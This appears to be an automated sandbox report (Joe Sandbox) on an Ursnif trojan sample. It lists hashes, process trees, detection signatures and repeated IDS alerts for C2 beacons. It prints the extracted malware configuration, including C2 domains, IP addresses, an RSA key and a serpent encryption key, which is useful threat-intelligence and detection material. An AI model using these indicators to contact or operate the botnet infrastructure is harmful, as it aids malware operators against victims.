Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SwFlsh32.exe

Overview

General Information

Sample Name:SwFlsh32.exe (renamed file extension from exe to dll)
Analysis ID:551599
MD5:4081fd95a87905a998b314f7bb4e8b14
SHA1:e9644e9686e3d5bc0f94099359520506722e601f
SHA256:45f11d97a8ed1a9215e9c6c8d44335229e17bd63bb0a48abcc8c2a02dca241c4
Tags:exe
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6888 cmdline: loaddll32.exe "C:\Users\user\Desktop\SwFlsh32.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6900 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6928 cmdline: rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 6916 cmdline: regsvr32.exe /s C:\Users\user\Desktop\SwFlsh32.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 6936 cmdline: rundll32.exe C:\Users\user\Desktop\SwFlsh32.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6328 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4624 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4532 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5560 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:148484 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5320 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1984 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5988 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5412 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6576 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 660 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5004 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3068 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 2696 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5512 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:148482 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4976 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5780 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5020 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4828 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17424 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4716 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:345090 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5636 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2288 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5636 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "J2tupkpEmwiDtgnUr9Ay045RBWOknqF27OtCMHo9P0wt7xePkeF0Yw7SkOAe/bBUWcu7iFAXZv+ivYhdLAEcSCS83w8q+v2AoKPgsGB5dihFd/8Lhi4+6B/tzBf4Fq/RJNwIcJqfTiVtrwrCOLksgItKEw9rXKhj3kxyRjoNns31hg7v1oDY1su7lCIig4grcmj0bp5CCwMXrc8VKm74e/VR/gzd/h3JujvT4Vp+Q6fm7VIslgsRuLX3LwHKXOyQhctLu4phdWLNJYCTKSs8q2Zs03m/KuCPNEh29GpSG5HHbgvUPGeQRKg1vIYUbdroKTAJ8Y/E7VyGETolc1qYv1Vf5JpzZ04husbQ0MCU8KU=", "c2_domain": ["mmmmmm.bar", "mmmmmm.casa"], "botnet": "7575", "server": "50", "serpent_key": "BvKP2Vg5UX8gFGh2", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.375865630.0000000005748000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.375941264.0000000005748000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.413490977.00000000039C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.377794576.00000000057F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000002.00000003.375998345.0000000005748000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 39 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Suspicious Call by OrdinalShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6900, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1, ProcessId: 6928

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000003.00000002.869838537.0000000000970000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "J2tupkpEmwiDtgnUr9Ay045RBWOknqF27OtCMHo9P0wt7xePkeF0Yw7SkOAe/bBUWcu7iFAXZv+ivYhdLAEcSCS83w8q+v2AoKPgsGB5dihFd/8Lhi4+6B/tzBf4Fq/RJNwIcJqfTiVtrwrCOLksgItKEw9rXKhj3kxyRjoNns31hg7v1oDY1su7lCIig4grcmj0bp5CCwMXrc8VKm74e/VR/gzd/h3JujvT4Vp+Q6fm7VIslgsRuLX3LwHKXOyQhctLu4phdWLNJYCTKSs8q2Zs03m/KuCPNEh29GpSG5HHbgvUPGeQRKg1vIYUbdroKTAJ8Y/E7VyGETolc1qYv1Vf5JpzZ04husbQ0MCU8KU=", "c2_domain": ["mmmmmm.bar", "mmmmmm.casa"], "botnet": "7575", "server": "50", "serpent_key": "BvKP2Vg5UX8gFGh2", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: SwFlsh32.dllVirustotal: Detection: 46%Perma Link
            Source: SwFlsh32.dllMetadefender: Detection: 20%Perma Link
            Source: SwFlsh32.dllReversingLabs: Detection: 32%
            Source: 2.2.regsvr32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 3.1.rundll32.exe.10000000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 4.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 4.1.rundll32.exe.10000000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 0.2.loaddll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 3.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_04B94872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00FA4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_051E4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: SwFlsh32.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49765 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49765 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49766 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49766 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49769 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49769 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49767 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49767 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49770 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49770 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49771 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49771 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49772 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49772 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49773 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49773 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49774 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49774 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49785 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49785 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49787 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49787 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49788 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49788 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49791 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49791 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49792 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49792 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49789 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49789 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49793 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49793 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49795 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49795 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49797 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49797 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49845 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49845 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49847 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49847 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 1478 WEB-CGI swc access 192.168.2.6:49848 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49848 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49848 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49852 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49852 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 1478 WEB-CGI swc access 192.168.2.6:49857 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49857 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49857 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49853 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49853 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 1478 WEB-CGI swc access 192.168.2.6:49856 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49856 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49856 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49858 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49858 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 1478 WEB-CGI swc access 192.168.2.6:49860 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49860 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49860 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49859 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49859 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 1478 WEB-CGI swc access 192.168.2.6:49861 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49861 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49861 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49862 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49862 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 1478 WEB-CGI swc access 192.168.2.6:49864 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49864 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49864 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49863 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49863 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 1478 WEB-CGI swc access 192.168.2.6:49865 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49865 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49865 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49868 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49868 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 1478 WEB-CGI swc access 192.168.2.6:49870 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49870 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49870 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49892 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49898 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49897 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49900 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49901 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49905 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49904 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49906 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49910 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49910 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49908 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49909 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49912 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49911 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49911 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49913 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49917 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49917 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49915 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49919 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49921 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49922 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49924 -> 31.41.45.66:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49925 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49925 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49926 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49926 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49927 -> 162.255.119.219:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49927 -> 162.255.119.219:80
